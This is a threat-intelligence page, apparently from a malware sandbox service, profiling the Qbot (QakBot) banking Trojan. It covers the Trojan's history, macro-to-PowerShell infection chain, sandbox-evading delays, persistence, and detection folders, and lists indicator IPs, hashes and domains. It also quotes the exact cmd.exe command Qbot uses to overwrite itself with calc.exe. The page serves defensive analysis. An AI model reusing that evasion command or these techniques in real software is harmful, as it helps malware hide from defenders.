Qbot is a banking Trojan — a malware designed to collect banking information from victims. Qbot targets organizations mostly in the US and it is equipped with a variety of sophisticated evasion and info-stealing functions, as well as worm-like functionality and a strong persistence mechanism.

Type
Trojan
Origin
Unknown
First seen
1 January, 2009
Last seen
20 October, 2020
Also known as
Pinkslipbot
QakBot
Quakbot
Global rank
19
Week rank
21
Month rank
12
IOCs
2314

What is Qbot?

Qbot, also known as QakBot, Pinkslipbot, and Quakbot is a Banking Trojan — malware that is designed to steal banking credentials, online banking session information, personal details of the victim or any other banking data.

Although early versions of Qbot have been spotted all the way back in 2009, this Trojan has been well maintained by its creators. Today, it continues to be active and features worm-like abilities to spread over networks, supports advanced web-injections techniques and has a persistence mechanism that some researchers believe to be one of the best in its class. Additionally, the Trojan has anti-VM, anti-debug and anti-sandbox functionally that makes research and analysis quite difficult.

Furthermore, Qbot is polymorphic, which means that it can change itself even after it is installed on an endpoint. The Trojan constantly modifies files and the dropper that the newer version of Qbot continuously cycles through command and control servers.

The combination of these functions makes Qbot highly dangerous malware. Since its first surfacing Qbot has been used in a number of successful attacks on organizations and governmental structures and has infected tens of thousands of machines.

General description of Qbot

Qbot is dispatched in targeted attacks against businesses. With this Trojan, the attackers go after bank accounts of organizations or private users who access their personal online banking cabinets from corporate networks by piggybacking into banking sessions of the victim.

The Trojan uses man-in-the-browser functionality to perform web-injections, allowing it to alter what the victims see on the banking website when browsing from an infected machine. Interestingly, while most malware samples that use this technique contain the web-injection code in their config file, Qbot is able to fetch the code from a controlled domain as it performs malicious activity.

Another trait that differentiates Qbot from other Trojans is its worm-like functionality. Qbot can copy itself using shared drives and spread over the network, spreading on its own or after receiving a command from the command and control server. Together with a highly developed persistence mechanism that uses registry runkeys and scheduled tasks, these traits make erasing Qbot from the infected network very difficult. The Trojan is designed to sustain itself despite system reboots and can launch itself automatically when the system is turned on again.

This infamous persistence functionality has allegedly caused compromise of sensitive information in two government organizations in Massachusetts in 2011, while worm-like behavior helped the Qbot to infiltrate thousands of machines and create a botnet with over 1,500 devices as the result of that attack.

Most of the targets that Qbot goes after are US-based organizations. Only about twenty percent of the targets are located outside of the United States. Although apart from the government offices most of the attacks have been directed at banking, tech and healthcare industries, there is no hard evidence to suggest that the attackers are aiming at specific fields. This means that business working in any industry can get hit by Qbot.

It is also important to note that the malware is operated by an advanced cybergang. Qbot attacks have been appearing on the radar of security researchers periodically, with phases of high activity and intervals when attacks would completely stop. This behavior is likely a way to avoid attracting too much attention from law enforcement and also allows attackers to tweak and improve the malware during their time off.

The group behind Qbot is also notoriously known for pushing out new modified samples of the malware at astonishing rates. They repack and re-scramble the code on a daily basis, making malware identification by means of anti-virus software unreliable.

Unfortunately, the identities of people behind Qbot are unknown, but it is widely believed that the cyber gang is based somewhere in Eastern Europe.

Qbot malware analysis

This video recorded in the ANY.RUN interactive malware hunting service shows the execution process of Qbot.

qbot_process_graph

Figure 1: displays the graph of processes created by the ANY.RUN interactive malware hunting service

Qbot execution process

Since Qbot is mostly targeted at the corporate sector, the main way of its penetration into infected systems is through a malicious document. In our example, maldoc starts several processes including Powershell through by using a macro. Then, using cmd.exe this trojan starts a chain of commands and executions, creating folders and temporary files. It utilizes Powershell to download the payload. It is notable that very often the name of the payload is as simple as six of the same digits or, less often, letters. Also, the payload often has a .png extension, although it is an executable file.

After that trojan starts its main execution, Qbot tries to evade detection by overwriting itself with the legitimate Windows executable calc.exe using following commands: cmd.exe /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > “Path to malware executable”. Qbot also injects explorer.exe and adds itself into autorun for persistence.

Qbot distribution

Qbot uses multiple attack vectors to infect victims. The malware uses email spam and phishing campaigns, as well as vulnerability exploits to infiltrate its targets. One of the more recent versions of the malware was observed being distributed by a dropper.

The dropper that installs Qbot is equipped with a delayed execution function. This means that after the dropper itself is downloaded onto a target machine, it waits around fifteen minutes before dropping the payload, likely in an effort to trick automatic sandboxes and avoid detection.

How to detect Qbot using ANY.RUN?

Qbot trojan creates files that allow analysts to detect it with a high degree of certainty. To detect Qbot, open the "Files" tab in the lower part of the task's window and take a look at the created folders. If you see folders with names such as "Zulycjadyc" and "imtaykad" within C:\Users\admin\AppData\ Roaming\Microsoft\ directory and .exe or .dat file with a name "ytfovlym", as shown on the figure below, be sure that it is Qbot in front of you.

how_to_detect_qbot

Figure 2: Detecting Qbot by local files

Conclusion

Security researchers successfully reversed a sample of Qbot in a 2020 investigation. Since the researchers managed to pinpoint a command and control server, they could identify the true scale of the attack. What they uncovered was an active Qbot botnet consisting of over 2,000 computers.

If there was any doubt that Qbot is an extremely serious threat, hopefully, this should clear it. Advanced web-injections, sophisticated anti-evasion techniques, worm-like functions and an experienced cyber gang that constantly updates the malware is a dangerous cocktail.

As security researchers, it is extremely important to analyze malware like Qbot, since code obfuscation makes research complicated and every investigation has the potential to uncover important data that will help businesses in the future avoid attacks or identify and eradicate this Trojan quicker. While Qbot avoids dynamic analysis with some automatic sandboxes with the delayed execution of its dropper as well as other tricks, interactive sandboxes like the one presented by the ANY.RUN malware hunting services are not so easily fooled.

ANY.RUN presents a good opportunity to perform dynamic analysis on this malware from a secure online environment and share your findings with fellow researchers in our public malware database.

IOCs

IP addresses
47.44.217.98
217.162.149.212
70.124.29.226
72.204.242.138
23.235.198.21
71.187.170.235
2.50.131.64
80.14.209.42
81.133.234.36
96.227.127.13
47.146.32.175
95.77.223.148
67.60.113.253
68.116.193.239
77.31.120.194
67.250.30.121
146.200.250.36
146.200.250.36
73.232.165.200
207.255.161.8
Hashes
48cfc44c4abb999b0a945919f4c15ccba517693222891915bb035872bfaca42b
5ce88567997551f0ff7e9bdff09ac6082e74ac95e14f46c7baec4c1da0488d6d
884852c74e05d43e1e7ef7cfb62aedc1bf29b4b137bb0d1180cea5c2640aceed
3b6ded24b70dd1dc3d4340b38a99690b489f52a21b2d8a53d2bf03e5cfe3cfef
1bf07d1621549da8acfa152bb4c4f53c8a3e9d1b5ce83c1ebd58b076784163f9
e4f8edfcba2f1bdca8af5c069158dcfb9d09129f3e0f4ffd0f702762d4c6b73f
c35f8737cb5e3df8f4da37b1e96af1c3f0edf407e36fe1a95e841ec2d63b75da
73c162b12ffe77df91cc648b204abe81b764561a0ca05d88eb7a5a008f179be5
7968e439b30c14367919bd4844ab1e1775cde9f57160650c37522bcd614fed88
07381325a3582428cc48e43512d272b45021741e646923a3d9b4d0c2b7251448
a736088b7b7d4f12d2aac3cc83ec05abdc9e4019b1b7daf9c848d98b4f8cbd88
79c04627cbd66b0c38d779a824a97dbb31c0cb1df807eb001013793a184328ed
432c6c97506c8296468e94dfdbc8bd9b81fa47ebfdf40f67cb1f96c51cdc12da
9f03172a982600f8f3fcba80c959f2aa117a3d5a3f62637487d3af58cf75b932
41bd1ec1598fe270ab75f325da57cfc75395a6a7a3bdf8f00bc22c68f0e37ef8
1ea355cdd4574702623527ac4d86e8f9def61a13aa8945521ff509453cc3dce1
679b57409ead1786eebce343009140054ed4dada25fe61c140a409634e5af875
8e9a0182ecdb430c8e89b54e97549b0eed4a29c9062ccb9c366e3b56b863c89b
7365dfc3f17367f55e5b676be38798e49e8cb9cdbb1c368deb586677d9d4423a
c8dcfc1fb7d3ce28b0ebf0d81c1af511c8446a1882c3148f2f21239f64c05279
Domains
ffoeefsheuesihfo.ru
isns.net
majul.com
elx01.knas.systems
awskohg.wecloudapi.com
secure.jsc0nten1maker.com
errors.newdatastatsserv.com
pumaskill.com
bagelbath.com
my.kankuedu.org
server.ncha.uk
somesub.louisianaquickdivorce.com
dmad.info
riifndisojdoj.in
cdn.ssstatic.net
ipruoamdmsngktvvhxluztsm.info
futureinterest.org
qwerty.tastywieners.com
dendy.oshkoshrugby.org
type.tastywieners.com

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat and JSocket is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Crimson RAT screenshot
Crimson RAT
crimson rat trojan
Crimson is a Remote Access Trojan — a malware that is used to take remote control of infected systems and steal data. This particular RAT is known to be used by a Pakistani founded cybergang that targets Indian military objects to steal sensitive information.
Read More
Danabot screenshot
Danabot
danabot trojan stealer
Danabot is an advanced banking Trojan malware that was designed to steal financial information from victims. Out of the Trojans in the wild this is one of the most advanced thanks to the modular design and a complex delivery method.
Read More